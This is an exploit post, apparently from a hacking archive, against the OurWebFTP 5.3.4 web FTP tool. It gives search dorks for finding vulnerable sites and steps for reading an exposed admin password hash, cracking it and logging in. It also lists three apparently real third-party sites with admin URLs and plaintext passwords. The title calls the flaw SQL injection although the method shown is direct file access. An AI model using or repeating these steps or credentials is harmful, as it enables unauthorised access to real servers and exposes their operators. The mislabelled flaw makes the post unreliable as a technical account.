facebook facebook twitter rss

OurWebFTP - Free Online FTP Ver. 5.3.4 SQL-injection vulnerability

Author: wlhaan hacker , Published: 12-10-2014
                          ||          ||   | ||
o_,_7 _|| . _o_7 _|| 4_|_|| o_w_,
( : / (_) / ( .
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
| _ __ __ __ ______ |
| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ |
| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ |
| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ |
| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ |
| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ |
| \ \____/ >> team wlhaan hacker |
| \/___/ |
| |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|


_____________________________________________________
OurWebFTP - Free Online FTP Ver. 5.3.4 SQL-injection vulnerability

#####################################################
# [+] Author : wlhaan hacker #
# [+] Email : iit@HoTMaiL.coM #
# [+] Site script : http://www.ourwebftp.com/ourwebftp_535.zip// #
# [+] team wlhaan Hacker #
# [+] Dork : "OurWebFTP - Free Online FTP Ver. 5.3.4"

or

inurl:"ftp/index.php?mwh=3"

#####################################################
Exploit:

http://server/path/mwftp5/hoster/_files/conf/admin_pass.php

now you will find pass admin MD5

just put hash MD5 IN google you il see pass :)

then back to admin page

http://server/path/index.php?mwh=3





# [+] DEMO
___________________________________
http://ftp.teilar.gr/mwftp5/hoster/_files/conf/admin_pass.php

login
http://ftp.teilar.gr/index.php?mwh=3

pass
noc1998
__________________________________
http://ukravto.in.ua/ftp/mwftp5/hoster/_files/conf/admin_pass.php

login
http://ukravto.in.ua/ftp/index.php?mwh=3

pass
cyjdsvujljv
___________________________________
http://fm.shop.fm/mwftp5/hoster/_files/conf/admin_pass.php

login
http://fm.shop.fm/index.php?mwh=3

pass
sulaiman
___________________________________





and good luck :D

miss to : shooq hacker ..

#####################################################
Discovered By : wlhaan hacker

https://twitter.com/waleedal3ybani

https://www.facebook.com/waleed.alaibani
#####################################################

Like us on Facebook :